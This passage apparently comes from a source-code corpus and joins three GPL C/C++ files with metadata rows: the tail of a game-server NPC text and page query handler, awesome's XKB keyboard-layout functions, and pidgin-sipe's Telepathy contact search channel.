GossipText const* pGossip = sObjectMgr->GetGossipText(textID);
WorldPacket data(SMSG_NPC_TEXT_UPDATE, 100); // guess size
data << textID;
if (!pGossip)
{
for (uint32 i = 0; i < MAX_GOSSIP_TEXT_OPTIONS; ++i)
{
data << float(0);
data << "Greetings $N";
data << "Greetings $N";
data << uint32(0);
data << uint32(0);
data << uint32(0);
data << uint32(0);
data << uint32(0);
data << uint32(0);
data << uint32(0);
}
}
else
{
std::string Text_0[MAX_LOCALES], Text_1[MAX_LOCALES];
for (int i = 0; i < MAX_GOSSIP_TEXT_OPTIONS; ++i)
{
Text_0[i]=pGossip->Options[i].Text_0;
Text_1[i]=pGossip->Options[i].Text_1;
}
int loc_idx = GetSessionDbLocaleIndex();
if (loc_idx >= 0)
{
if (NpcTextLocale const* nl = sObjectMgr->GetNpcTextLocale(textID))
{
for (int i = 0; i < MAX_LOCALES; ++i)
{
ObjectMgr::GetLocaleString(nl->Text_0[i], loc_idx, Text_0[i]);
ObjectMgr::GetLocaleString(nl->Text_1[i], loc_idx, Text_1[i]);
}
}
}
for (int i = 0; i < MAX_GOSSIP_TEXT_OPTIONS; ++i)
{
data << pGossip->Options[i].Probability;
if (Text_0[i].empty())
data << Text_1[i];
else
data << Text_0[i];
if (Text_1[i].empty())
data << Text_0[i];
else
data << Text_1[i];
data << pGossip->Options[i].Language;
for (int j = 0; j < MAX_GOSSIP_TEXT_EMOTES; ++j)
{
data << pGossip->Options[i].Emotes[j]._Delay;
data << pGossip->Options[i].Emotes[j]._Emote;
}
}
}
SendPacket(&data);
IC_LOG_DEBUG("network", "WORLD: Sent SMSG_NPC_TEXT_UPDATE");
}
/// Only _static_ data is sent in this packet !!!
void WorldSession::HandlePageQueryOpcode(WorldPacket& recvData)
{
IC_LOG_DEBUG("network", "WORLD: Received CMSG_PAGE_TEXT_QUERY");
uint32 pageID;
recvData >> pageID;
recvData.read_skip<uint64>(); // guid
while (pageID)
{
PageText const* pageText = sObjectMgr->GetPageText(pageID);
// guess size
WorldPacket data(SMSG_PAGE_TEXT_QUERY_RESPONSE, 50);
data << pageID;
if (!pageText)
{
data << "Item page missing.";
data << uint32(0);
pageID = 0;
}
else
{
std::string Text = pageText->Text;
int loc_idx = GetSessionDbLocaleIndex();
if (loc_idx >= 0)
if (PageTextLocale const* player = sObjectMgr->GetPageTextLocale(pageID))
ObjectMgr::GetLocaleString(player->Text, loc_idx, Text);
data << Text;
data << uint32(pageText->NextPage);
pageID = pageText->NextPage;
}
SendPacket(&data);
IC_LOG_DEBUG("network", "WORLD: Sent SMSG_PAGE_TEXT_QUERY_RESPONSE");
}
}
/*
void WorldSession::HandleCorpseMapPositionQuery(WorldPacket& recvData)
{
IC_LOG_DEBUG("network", "WORLD: Recv CMSG_CORPSE_MAP_POSITION_QUERY");
uint32 unk;
recvData >> unk;
WorldPacket data(SMSG_CORPSE_MAP_POSITION_QUERY_RESPONSE, 4+4+4+4);
data << float(0);
data << float(0);
data << float(0);
data << float(0);
SendPacket(&data);
}
*/ | gpl-2.0 |
psychon/awesome | xkb.c | 2 | 14482 | /*
* xkb.c - keyboard layout control functions
*
* Copyright © 2015 Aleksey Fedotov <lexa@cfotr.com>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program; if not, write to the Free Software Foundation, Inc.,
* 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
*
*/
/**
* @module awesome
*/
#include "xkb.h"
#include "globalconf.h"
#include "xwindow.h"
#include "objects/client.h"
#include "common/atoms.h"
#include <xcb/xkb.h>
#include <xkbcommon/xkbcommon.h>
#include <xkbcommon/xkbcommon-x11.h>
/**
* Switch keyboard layout.
*
* @function xkb_set_layout_group
* @tparam integer num keyboard layout number, integer from 0 to 3
*/
int
luaA_xkb_set_layout_group(lua_State *L)
{
unsigned group = luaL_checkinteger(L, 1);
if (!globalconf.have_xkb)
{
luaA_warn(L, "XKB not supported");
return 0;
}
xcb_xkb_latch_lock_state (globalconf.connection, XCB_XKB_ID_USE_CORE_KBD,
0, 0, true, group, 0, 0, 0);
return 0;
}
/**
* Get current layout number.
*
* @function xkb_get_layout_group
* @treturn integer num Current layout number, integer from 0 to 3.
*/
int
luaA_xkb_get_layout_group(lua_State *L)
{
if (!globalconf.have_xkb)
{
luaA_warn(L, "XKB not supported");
return 0;
}
xcb_xkb_get_state_cookie_t state_c;
state_c = xcb_xkb_get_state_unchecked (globalconf.connection,
XCB_XKB_ID_USE_CORE_KBD);
xcb_xkb_get_state_reply_t* state_r;
state_r = xcb_xkb_get_state_reply (globalconf.connection,
state_c, NULL);
if (!state_r)
{
free(state_r);
return 0;
}
lua_pushinteger(L, state_r->group);
free(state_r);
return 1;
}
/**
* Get layout short names.
*
* @function xkb_get_group_names
* @treturn string A string describing the current layout settings,
* e.g.: 'pc+us+de:2+inet(evdev)+group(alt_shift_toggle)+ctrl(nocaps)'
*/
int
luaA_xkb_get_group_names(lua_State *L)
{
if (!globalconf.have_xkb)
{
luaA_warn(L, "XKB not supported");
return 0;
}
xcb_xkb_get_names_cookie_t name_c;
name_c = xcb_xkb_get_names_unchecked (globalconf.connection,
XCB_XKB_ID_USE_CORE_KBD,
XCB_XKB_NAME_DETAIL_SYMBOLS);
xcb_xkb_get_names_reply_t* name_r;
name_r = xcb_xkb_get_names_reply (globalconf.connection, name_c, NULL);
if (!name_r)
{
luaA_warn(L, "Failed to get xkb symbols name");
return 0;
}
xcb_xkb_get_names_value_list_t name_list;
void *buffer = xcb_xkb_get_names_value_list(name_r);
xcb_xkb_get_names_value_list_unpack (
buffer, name_r->nTypes, name_r->indicators,
name_r->virtualMods, name_r->groupNames, name_r->nKeys,
name_r->nKeyAliases, name_r->nRadioGroups, name_r->which,
&name_list);
xcb_get_atom_name_cookie_t atom_name_c;
atom_name_c = xcb_get_atom_name_unchecked(globalconf.connection, name_list.symbolsName);
xcb_get_atom_name_reply_t *atom_name_r;
atom_name_r = xcb_get_atom_name_reply(globalconf.connection, atom_name_c, NULL);
if (!atom_name_r) {
luaA_warn(L, "Failed to get atom symbols name");
free(name_r);
return 0;
}
const char *name = xcb_get_atom_name_name(atom_name_r);
size_t name_len = xcb_get_atom_name_name_length(atom_name_r);
lua_pushlstring(L, name, name_len);
free(atom_name_r);
free(name_r);
return 1;
}
static bool
fill_rmlvo_from_root(struct xkb_rule_names *xkb_names)
{
xcb_get_property_reply_t *prop_reply = xcb_get_property_reply(globalconf.connection,
xcb_get_property_unchecked(globalconf.connection, false, globalconf.screen->root, _XKB_RULES_NAMES, XCB_GET_PROPERTY_TYPE_ANY, 0, UINT_MAX),
NULL);
if (!prop_reply)
return false;
if (prop_reply->value_len == 0)
{
p_delete(&prop_reply);
return false;
}
const char *walk = (const char *) xcb_get_property_value(prop_reply);
unsigned int remaining = xcb_get_property_value_length(prop_reply);
for (int i = 0; i < 5 && remaining > 0; i++)
{
const int len = strnlen(walk, remaining);
switch (i) {
case 0:
xkb_names->rules = strndup(walk, len);
break;
case 1:
xkb_names->model = strndup(walk, len);
break;
case 2:
xkb_names->layout = strndup(walk, len);
break;
case 3:
xkb_names->variant = strndup(walk, len);
break;
case 4:
xkb_names->options = strndup(walk, len);
break;
}
remaining -= len + 1;
walk = &walk[len + 1];
}
p_delete(&prop_reply);
return true;
}
/** Fill globalconf.xkb_state based on connection and context
*/
static void
xkb_fill_state(void)
{
xcb_connection_t *conn = globalconf.connection;
int32_t device_id = -1;
if (globalconf.have_xkb)
{
device_id = xkb_x11_get_core_keyboard_device_id(conn);
if (device_id == -1)
warn("Failed while getting XKB device id");
}
if (device_id != -1)
{
struct xkb_keymap *xkb_keymap = xkb_x11_keymap_new_from_device(
globalconf.xkb_ctx,
conn,
device_id,
XKB_KEYMAP_COMPILE_NO_FLAGS);
if (!xkb_keymap)
fatal("Failed while getting XKB keymap from device");
globalconf.xkb_state = xkb_x11_state_new_from_device(xkb_keymap,
conn,
device_id);
if (!globalconf.xkb_state)
fatal("Failed while getting XKB state from device");
/* xkb_keymap is no longer referenced directly; decreasing refcount */
xkb_keymap_unref(xkb_keymap);
}
else
{
struct xkb_rule_names names = { NULL, NULL, NULL, NULL, NULL };
if (!fill_rmlvo_from_root(&names))
warn("Could not get _XKB_RULES_NAMES from root window, falling back to defaults.");
struct xkb_keymap *xkb_keymap = xkb_keymap_new_from_names(globalconf.xkb_ctx, &names, 0);
globalconf.xkb_state = xkb_state_new(xkb_keymap);
if (!globalconf.xkb_state)
fatal("Failed while creating XKB state");
/* xkb_keymap is no longer referenced directly; decreasing refcount */
xkb_keymap_unref(xkb_keymap);
p_delete(&names.rules);
p_delete(&names.model);
p_delete(&names.layout);
p_delete(&names.variant);
p_delete(&names.options);
}
}
/** Loads xkb context, state and keymap to globalconf.
* These variables should be freed by xkb_free_keymap() afterwards
*/
static void
xkb_init_keymap(void)
{
globalconf.xkb_ctx = xkb_context_new(XKB_CONTEXT_NO_FLAGS);
if (!globalconf.xkb_ctx)
fatal("Failed while getting XKB context");
xkb_fill_state();
}
/** Frees xkb context, state and keymap from globalconf.
* This should be used when these variables will not be used anymore
*/
static void
xkb_free_keymap(void)
{
xkb_state_unref(globalconf.xkb_state);
xkb_context_unref(globalconf.xkb_ctx);
}
/** Rereads the state of keyboard from X.
* This call should be used after receiving NewKeyboardNotify or MapNotify,
* as written in http://xkbcommon.org/doc/current/group__x11.html
*/
static void
xkb_reload_keymap(void)
{
assert(globalconf.have_xkb);
xkb_state_unref(globalconf.xkb_state);
xkb_fill_state();
/* Free and then allocate the key symbols */
xcb_key_symbols_free(globalconf.keysyms);
globalconf.keysyms = xcb_key_symbols_alloc(globalconf.connection);
/* Regrab key bindings on the root window */
xcb_screen_t *s = globalconf.screen;
xwindow_grabkeys(s->root, &globalconf.keys);
/* Regrab key bindings on clients */
foreach(_c, globalconf.clients)
{
client_t *c = *_c;
xwindow_grabkeys(c->window, &c->keys);
if (c->nofocus_window)
xwindow_grabkeys(c->nofocus_window, &c->keys);
}
}
static gboolean
xkb_refresh(gpointer unused)
{
lua_State *L = globalconf_get_lua_State();
globalconf.xkb_update_pending = false;
if (globalconf.xkb_reload_keymap)
xkb_reload_keymap();
if (globalconf.xkb_map_changed)
signal_object_emit(L, &global_signals, "xkb::map_changed", 0);
if (globalconf.xkb_group_changed)
signal_object_emit(L, &global_signals, "xkb::group_changed", 0);
globalconf.xkb_reload_keymap = false;
globalconf.xkb_map_changed = false;
globalconf.xkb_group_changed = false;
return G_SOURCE_REMOVE;
}
static void
xkb_schedule_refresh(void)
{
if (globalconf.xkb_update_pending)
return;
globalconf.xkb_update_pending = true;
g_idle_add_full(G_PRIORITY_LOW, xkb_refresh, NULL, NULL);
}
/** The xkb notify event handler.
* \param event The event.
*/
void
event_handle_xkb_notify(xcb_generic_event_t* event)
{
assert(globalconf.have_xkb);
/* The pad0 field of xcb_generic_event_t contains the event sub-type,
* unfortunately xkb doesn't provide a usable struct for getting this in a
* nicer way*/
switch (event->pad0)
{
case XCB_XKB_NEW_KEYBOARD_NOTIFY:
{
xcb_xkb_new_keyboard_notify_event_t *new_keyboard_event = (void*)event;
globalconf.xkb_reload_keymap = true;
if (new_keyboard_event->changed & XCB_XKB_NKN_DETAIL_KEYCODES)
globalconf.xkb_map_changed = true;
xkb_schedule_refresh();
break;
}
case XCB_XKB_MAP_NOTIFY:
{
globalconf.xkb_reload_keymap = true;
globalconf.xkb_map_changed = true;
xkb_schedule_refresh();
break;
}
case XCB_XKB_STATE_NOTIFY:
{
xcb_xkb_state_notify_event_t *state_notify_event = (void*)event;
xkb_state_update_mask(globalconf.xkb_state,
state_notify_event->baseMods,
state_notify_event->latchedMods,
state_notify_event->lockedMods,
state_notify_event->baseGroup,
state_notify_event->latchedGroup,
state_notify_event->lockedGroup);
if (state_notify_event->changed & XCB_XKB_STATE_PART_GROUP_STATE)
{
globalconf.xkb_group_changed = true;
xkb_schedule_refresh();
}
break;
}
}
}
/** Initialize XKB support
* This call allocates resources, that should be freed by calling xkb_free()
*/
void
xkb_init(void)
{
globalconf.xkb_update_pending = false;
globalconf.xkb_reload_keymap = false;
globalconf.xkb_map_changed = false;
globalconf.xkb_group_changed = false;
int success_xkb = xkb_x11_setup_xkb_extension(globalconf.connection,
XKB_X11_MIN_MAJOR_XKB_VERSION,
XKB_X11_MIN_MINOR_XKB_VERSION,
0,
NULL,
NULL,
NULL,
NULL);
globalconf.have_xkb = success_xkb;
if (!success_xkb) {
warn("XKB not found or not supported");
xkb_init_keymap();
return;
}
uint16_t map = XCB_XKB_EVENT_TYPE_STATE_NOTIFY | XCB_XKB_EVENT_TYPE_MAP_NOTIFY | XCB_XKB_EVENT_TYPE_NEW_KEYBOARD_NOTIFY;
//
// These maps are provided to allow key remapping,
// that could be used in awesome
//
uint16_t map_parts = XCB_XKB_MAP_PART_KEY_TYPES |
XCB_XKB_MAP_PART_KEY_SYMS |
XCB_XKB_MAP_PART_MODIFIER_MAP |
XCB_XKB_MAP_PART_EXPLICIT_COMPONENTS |
XCB_XKB_MAP_PART_KEY_ACTIONS |
XCB_XKB_MAP_PART_KEY_BEHAVIORS |
XCB_XKB_MAP_PART_VIRTUAL_MODS |
XCB_XKB_MAP_PART_VIRTUAL_MOD_MAP;
/* Enable detectable auto-repeat, but ignore failures */
xcb_discard_reply(globalconf.connection,
xcb_xkb_per_client_flags(globalconf.connection,
XCB_XKB_ID_USE_CORE_KBD,
XCB_XKB_PER_CLIENT_FLAG_DETECTABLE_AUTO_REPEAT,
XCB_XKB_PER_CLIENT_FLAG_DETECTABLE_AUTO_REPEAT,
0,
0,
0)
.sequence);
xcb_xkb_select_events(globalconf.connection,
XCB_XKB_ID_USE_CORE_KBD,
map,
0,
map,
map_parts,
map_parts,
0);
/* load keymap to use when resolving keypresses */
xkb_init_keymap();
}
/** Frees resources allocated by xkb_init()
*/
void
xkb_free(void)
{
if (globalconf.have_xkb)
// unsubscribe from all events
xcb_xkb_select_events(globalconf.connection,
XCB_XKB_ID_USE_CORE_KBD,
0,
0,
0,
0,
0,
0);
xkb_free_keymap();
}
// vim: filetype=c:expandtab:shiftwidth=4:tabstop=8:softtabstop=4:textwidth=80
| gpl-2.0 |
mooninite/sipe | src/telepathy/telepathy-search.c | 2 | 19149 | /**
* @file telepathy-search.c
*
* pidgin-sipe
*
* Copyright (C) 2012-2014 SIPE Project <http://sipe.sourceforge.net/>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*/
#ifdef HAVE_CONFIG_H
#include "config.h"
#endif
#include <string.h>
#include <glib-object.h>
#include <telepathy-glib/svc-channel.h>
#include <telepathy-glib/telepathy-glib.h>
#include "sipe-backend.h"
#include "sipe-common.h"
#include "sipe-core.h"
#include "telepathy-private.h"
/* vCard/Telepathy search field names */
#define SIPE_TELEPATHY_SEARCH_KEY_FIRST "x-n-given"
#define SIPE_TELEPATHY_SEARCH_KEY_LAST "x-n-family"
#define SIPE_TELEPATHY_SEARCH_KEY_EMAIL "email"
#define SIPE_TELEPATHY_SEARCH_KEY_COMPANY "x-org-name"
#define SIPE_TELEPATHY_SEARCH_KEY_COUNTRY "x-adr-country"
#define SIPE_TELEPATHY_SEARCH_KEY_FULLNAME "fn"
#define SIPE_TELEPATHY_SEARCH_KEY_BLOB "" /* one big search box */
G_BEGIN_DECLS
/*
* Search Manager class - data structures
*/
typedef struct _SipeSearchManagerClass {
GObjectClass parent_class;
} SipeSearchManagerClass;
typedef struct _SipeSearchManager {
GObject parent;
GObject *connection;
GHashTable *channels;
} SipeSearchManager;
/*
* Search Manager class - type macros
*/
/* telepathy-private.h: #define SIPE_TYPE_SEARCH_MANAGER ... */
#define SIPE_SEARCH_MANAGER(obj) \
(G_TYPE_CHECK_INSTANCE_CAST((obj), SIPE_TYPE_SEARCH_MANAGER, \
SipeSearchManager))
/*
* Search Channel class - data structures
*/
typedef struct _SipeSearchChannelClass {
TpBaseChannelClass parent_class;
} SipeSearchChannelClass;
typedef struct _SipeSearchChannel {
TpBaseChannel parent;
GObject *connection;
GHashTable *results;
TpChannelContactSearchState state;
} SipeSearchChannel;
/*
* Search Channel class - type macros
*/
static GType sipe_search_channel_get_type(void) G_GNUC_CONST;
#define SIPE_TYPE_SEARCH_CHANNEL \
(sipe_search_channel_get_type())
#define SIPE_SEARCH_CHANNEL(obj) \
(G_TYPE_CHECK_INSTANCE_CAST((obj), SIPE_TYPE_SEARCH_CHANNEL, \
SipeSearchChannel))
G_END_DECLS
/*
* Search Manager class - type definition
*/
static void channel_manager_iface_init(gpointer, gpointer);
G_DEFINE_TYPE_WITH_CODE(SipeSearchManager,
sipe_search_manager,
G_TYPE_OBJECT,
G_IMPLEMENT_INTERFACE(TP_TYPE_CHANNEL_MANAGER,
channel_manager_iface_init);
)
/*
* Search Manager class - type definition
*/
static void contact_search_iface_init(gpointer, gpointer);
G_DEFINE_TYPE_WITH_CODE(SipeSearchChannel,
sipe_search_channel,
TP_TYPE_BASE_CHANNEL,
G_IMPLEMENT_INTERFACE(TP_TYPE_SVC_CHANNEL_TYPE_CONTACT_SEARCH,
contact_search_iface_init);
)
/*
* Search Manager class - instance methods
*/
static void sipe_search_manager_constructed(GObject *object)
{
SipeSearchManager *self = SIPE_SEARCH_MANAGER(object);
void (*chain_up)(GObject *) = G_OBJECT_CLASS(sipe_search_manager_parent_class)->constructed;
if (chain_up)
chain_up(object);
self->channels = g_hash_table_new(g_direct_hash, g_direct_equal);
}
static void sipe_search_manager_dispose(GObject *object)
{
SipeSearchManager *self = SIPE_SEARCH_MANAGER(object);
void (*chain_up)(GObject *) = G_OBJECT_CLASS(sipe_search_manager_parent_class)->constructed;
tp_clear_pointer(&self->channels, g_hash_table_unref);
tp_clear_object(&self->connection);
if (chain_up)
chain_up(object);
}
/*
* Search Manager class - type implementation
*/
static void sipe_search_manager_class_init(SipeSearchManagerClass *klass)
{
GObjectClass *object_class = G_OBJECT_CLASS(klass);
SIPE_DEBUG_INFO_NOFORMAT("SipeSearchManager::class_init");
object_class->constructed = sipe_search_manager_constructed;
object_class->dispose = sipe_search_manager_dispose;
}
static void sipe_search_manager_init(SIPE_UNUSED_PARAMETER SipeSearchManager *self)
{
SIPE_DEBUG_INFO_NOFORMAT("SipeSearchManager::init");
}
/*
* Search Manager class - interface implementation
*
* Channel Manager
*/
static void foreach_channel(TpChannelManager *manager,
TpExportableChannelFunc func,
gpointer user_data)
{
SipeSearchManager *self = SIPE_SEARCH_MANAGER(manager);
GHashTableIter iter;
gpointer chan;
SIPE_DEBUG_INFO_NOFORMAT("SipeSearchManager::foreach_channel");
g_hash_table_iter_init(&iter, self->channels);
while (g_hash_table_iter_next(&iter, &chan, NULL))
func(chan, user_data);
}
static void type_foreach_channel_class(GType type,
TpChannelManagerTypeChannelClassFunc func,
gpointer user_data)
{
static const gchar *const no_props[] = {
NULL
};
GHashTable *table = g_hash_table_new_full(g_str_hash, g_str_equal,
NULL,
(GDestroyNotify) tp_g_value_slice_free);
SIPE_DEBUG_INFO_NOFORMAT("SipeSearchManager::type_foreach_channel_class");
g_hash_table_insert(table,
TP_IFACE_CHANNEL ".ChannelType",
tp_g_value_slice_new_string(TP_IFACE_CHANNEL_TYPE_CONTACT_SEARCH));
func(type, table, no_props, user_data);
g_hash_table_unref(table);
}
static void search_channel_closed_cb(SipeSearchChannel *channel,
SipeSearchManager *self)
{
SIPE_DEBUG_INFO("SipeSearchManager::search_channel_close_cb: %p", channel);
tp_channel_manager_emit_channel_closed_for_object(self,
(TpExportableChannel *) channel);
g_hash_table_remove(self->channels, channel);
}
static GObject *search_channel_new(GObject *connection);
static gboolean create_channel(TpChannelManager *manager,
gpointer request_token,
GHashTable *request_properties)
{
SipeSearchManager *self = SIPE_SEARCH_MANAGER(manager);
GObject *channel;
GSList *request_tokens;
SIPE_DEBUG_INFO_NOFORMAT("SipeSearchManager::create_channel");
if (tp_strdiff(tp_asv_get_string(request_properties,
TP_IFACE_CHANNEL ".ChannelType"),
TP_IFACE_CHANNEL_TYPE_CONTACT_SEARCH))
return(FALSE);
/* create new search channel */
channel = search_channel_new(self->connection);
g_hash_table_insert(self->channels, channel, NULL);
g_signal_connect(channel,
"closed",
(GCallback) search_channel_closed_cb,
self);
/* publish new channel */
request_tokens = g_slist_prepend(NULL, request_token);
tp_channel_manager_emit_new_channel(self,
TP_EXPORTABLE_CHANNEL(channel),
request_tokens);
g_slist_free(request_tokens);
return(TRUE);
}
static void channel_manager_iface_init(gpointer g_iface,
SIPE_UNUSED_PARAMETER gpointer iface_data)
{
TpChannelManagerIface *iface = g_iface;
#define IMPLEMENT(x, y) iface->x = y
IMPLEMENT(foreach_channel, foreach_channel);
IMPLEMENT(type_foreach_channel_class, type_foreach_channel_class);
IMPLEMENT(create_channel, create_channel);
IMPLEMENT(request_channel, create_channel);
/* Ensuring these channels doesn't really make much sense. */
IMPLEMENT(ensure_channel, NULL);
#undef IMPLEMENT
}
/* create new search manager object */
GObject *sipe_telepathy_search_new(TpBaseConnection *connection)
{
SipeSearchManager *self = g_object_new(SIPE_TYPE_SEARCH_MANAGER, NULL);
self->connection = g_object_ref(connection);
return(G_OBJECT(self));
}
/*
* Search Channel class - instance methods
*/
enum {
CHANNEL_PROP_SEARCH_KEYS = 1,
CHANNEL_LAST_PROP
};
static void get_property(GObject *object,
guint property_id,
GValue *value,
GParamSpec *pspec)
{
switch (property_id)
{
case CHANNEL_PROP_SEARCH_KEYS: {
/* vCard/Telepathy search field names */
static const gchar const *search_keys[] = {
SIPE_TELEPATHY_SEARCH_KEY_FIRST,
SIPE_TELEPATHY_SEARCH_KEY_LAST,
SIPE_TELEPATHY_SEARCH_KEY_EMAIL,
SIPE_TELEPATHY_SEARCH_KEY_COMPANY,
SIPE_TELEPATHY_SEARCH_KEY_COUNTRY,
SIPE_TELEPATHY_SEARCH_KEY_FULLNAME,
SIPE_TELEPATHY_SEARCH_KEY_BLOB,
NULL
};
g_value_set_boxed(value, search_keys);
}
break;
default:
G_OBJECT_WARN_INVALID_PROPERTY_ID(object, property_id, pspec);
break;
}
}
static void fill_immutable_properties(TpBaseChannel *channel,
GHashTable *properties)
{
TP_BASE_CHANNEL_CLASS(sipe_search_channel_parent_class)->fill_immutable_properties(channel,
properties);
tp_dbus_properties_mixin_fill_properties_hash(G_OBJECT(channel),
properties,
TP_IFACE_CHANNEL_TYPE_CONTACT_SEARCH, "AvailableSearchKeys",
NULL);
}
static gchar *get_object_path_suffix(TpBaseChannel *base)
{
return(g_strdup_printf ("SearchChannel_%p", base));
}
static GPtrArray *get_interfaces(TpBaseChannel *self)
{
GPtrArray *interfaces = TP_BASE_CHANNEL_CLASS(sipe_search_channel_parent_class)->get_interfaces(self);
return(interfaces);
}
static void sipe_search_channel_constructed(GObject *object)
{
SipeSearchChannel *self = SIPE_SEARCH_CHANNEL(object);
void (*chain_up)(GObject *) = G_OBJECT_CLASS(sipe_search_channel_parent_class)->constructed;
if (chain_up)
chain_up(object);
self->results = NULL;
}
static void sipe_search_channel_finalize(GObject *object)
{
SipeSearchChannel *self = SIPE_SEARCH_CHANNEL(object);
SIPE_DEBUG_INFO_NOFORMAT("SipeSearchChannel::finalize");
if (self->results)
g_hash_table_unref(self->results);
G_OBJECT_CLASS(sipe_search_channel_parent_class)->finalize(object);
}
/*
* Search Channel class - type implementation
*/
static void sipe_search_channel_class_init(SipeSearchChannelClass *klass)
{
static TpDBusPropertiesMixinPropImpl props[] = {
{
.name = "AvailableSearchKeys",
.getter_data = "available-search-keys",
.setter_data = NULL
},
{
.name = NULL
}
};
GObjectClass *object_class = G_OBJECT_CLASS(klass);
TpBaseChannelClass *base_class = TP_BASE_CHANNEL_CLASS(klass);
GParamSpec *ps;
SIPE_DEBUG_INFO_NOFORMAT("SipeSearchChannel::class_init");
object_class->constructed = sipe_search_channel_constructed;
object_class->finalize = sipe_search_channel_finalize;
object_class->get_property = get_property;
base_class->channel_type = TP_IFACE_CHANNEL_TYPE_CONTACT_SEARCH;
base_class->target_handle_type = TP_HANDLE_TYPE_NONE;
base_class->fill_immutable_properties = fill_immutable_properties;
base_class->get_object_path_suffix = get_object_path_suffix;
base_class->interfaces = NULL;
base_class->get_interfaces = get_interfaces;
base_class->close = tp_base_channel_destroyed;
ps = g_param_spec_boxed("available-search-keys",
"Available search keys",
"The set of search keys supported by this channel",
G_TYPE_STRV,
G_PARAM_READABLE | G_PARAM_STATIC_STRINGS);
g_object_class_install_property(object_class,
CHANNEL_PROP_SEARCH_KEYS,
ps);
tp_dbus_properties_mixin_implement_interface(object_class,
TP_IFACE_QUARK_CHANNEL_TYPE_CONTACT_SEARCH,
tp_dbus_properties_mixin_getter_gobject_properties,
NULL,
props);
}
static void sipe_search_channel_init(SIPE_UNUSED_PARAMETER SipeSearchChannel *self)
{
SIPE_DEBUG_INFO_NOFORMAT("SipeSearchChannel::init");
}
/*
* Search Channel class - interface implementation
*
* Contact search
*/
static void search_channel_state(SipeSearchChannel *self,
TpChannelContactSearchState new_state,
const gchar *msg)
{
GHashTable *details = tp_asv_new(NULL, NULL);
if (msg)
tp_asv_set_string(details, "debug-message", msg);
tp_svc_channel_type_contact_search_emit_search_state_changed(self,
new_state,
msg ? msg : "",
details);
g_hash_table_unref(details);
self->state = new_state;
}
static void search_channel_search(TpSvcChannelTypeContactSearch *channel,
GHashTable *terms,
DBusGMethodInvocation *context)
{
SipeSearchChannel *self = SIPE_SEARCH_CHANNEL(channel);
SIPE_DEBUG_INFO_NOFORMAT("SipeSearchChannel::search");
if (self->state == TP_CHANNEL_CONTACT_SEARCH_STATE_NOT_STARTED) {
const gchar *first = g_hash_table_lookup(terms,
SIPE_TELEPATHY_SEARCH_KEY_FIRST);
const gchar *last = g_hash_table_lookup(terms,
SIPE_TELEPATHY_SEARCH_KEY_LAST);
const gchar *email = g_hash_table_lookup(terms,
SIPE_TELEPATHY_SEARCH_KEY_EMAIL);
const gchar *company = g_hash_table_lookup(terms,
SIPE_TELEPATHY_SEARCH_KEY_COMPANY);
const gchar *country = g_hash_table_lookup(terms,
SIPE_TELEPATHY_SEARCH_KEY_COUNTRY);
struct sipe_backend_private *telepathy_private = sipe_telepathy_connection_private(self->connection);
gchar **split = NULL;
/* did the requester honor our "AvailableSearchKeys"? */
if (!(first || last || email || company || country)) {
const gchar *alternative = g_hash_table_lookup(terms,
SIPE_TELEPATHY_SEARCH_KEY_FULLNAME);
/* No. Did he give a full name instead? */
if (alternative) {
SIPE_DEBUG_INFO("SipeSearchChannel::search: full name given: '%s'",
alternative);
/* assume:
* - one word -> first name
* - two words -> first & last name
*/
split = g_strsplit(alternative, " ", 3);
if (split[0]) {
first = split[0];
if (split[1])
last = split[1];
}
/* No. Did he give a "on big search box" instead? */
} else if ((alternative = g_hash_table_lookup(terms,
SIPE_TELEPATHY_SEARCH_KEY_BLOB))
!= NULL) {
SIPE_DEBUG_INFO("SipeSearchChannel::search: one big search box given: '%s'",
alternative);
/* assume:
* - one word with '@' -> email
* - one word -> first name
* - two words -> first & last name
*/
split = g_strsplit(alternative, " ", 3);
if (split[0]) {
if (strchr(split[0], '@')) {
email = split[0];
} else {
first = split[0];
if (split[1])
last = split[1];
}
}
} else
SIPE_DEBUG_ERROR_NOFORMAT("SipeSearchChannel::search: no valid terms found");
}
sipe_core_buddy_search(telepathy_private->public,
(struct sipe_backend_search_token *) self,
first, last, email, NULL, company, country);
g_strfreev(split);
/* only switch to "in progress" if the above didn't fail */
if (self->state == TP_CHANNEL_CONTACT_SEARCH_STATE_NOT_STARTED)
search_channel_state(self,
TP_CHANNEL_CONTACT_SEARCH_STATE_IN_PROGRESS,
NULL);
tp_svc_channel_type_contact_search_return_from_search(context);
} else {
GError *error = g_error_new(TP_ERROR, TP_ERROR_NOT_AVAILABLE,
"invalid search state");
dbus_g_method_return_error(context, error);
g_error_free(error);
}
}
static void contact_search_iface_init(gpointer g_iface,
SIPE_UNUSED_PARAMETER gpointer iface_data)
{
TpSvcChannelTypeContactSearchClass *klass = g_iface;
#define IMPLEMENT(x) tp_svc_channel_type_contact_search_implement_##x( \
klass, search_channel_##x)
IMPLEMENT(search);
/* we don't support stopping a search */
#undef IMPLEMENT
}
/* create new search channel object */
static GObject *search_channel_new(GObject *connection)
{
/* property "connection" required by TpBaseChannel */
SipeSearchChannel *self = g_object_new(SIPE_TYPE_SEARCH_CHANNEL,
"connection", connection,
NULL);
self->connection = g_object_ref(connection);
self->state = TP_CHANNEL_CONTACT_SEARCH_STATE_NOT_STARTED;
tp_base_channel_register(TP_BASE_CHANNEL(self));
return(G_OBJECT(self));
}
/*
* Backend adaptor functions
*/
void sipe_backend_search_failed(SIPE_UNUSED_PARAMETER struct sipe_core_public *sipe_public,
struct sipe_backend_search_token *token,
const gchar *msg)
{
SIPE_DEBUG_INFO("sipe_backend_search_failed: %s", msg);
search_channel_state(SIPE_SEARCH_CHANNEL(token),
TP_CHANNEL_CONTACT_SEARCH_STATE_FAILED,
msg);
}
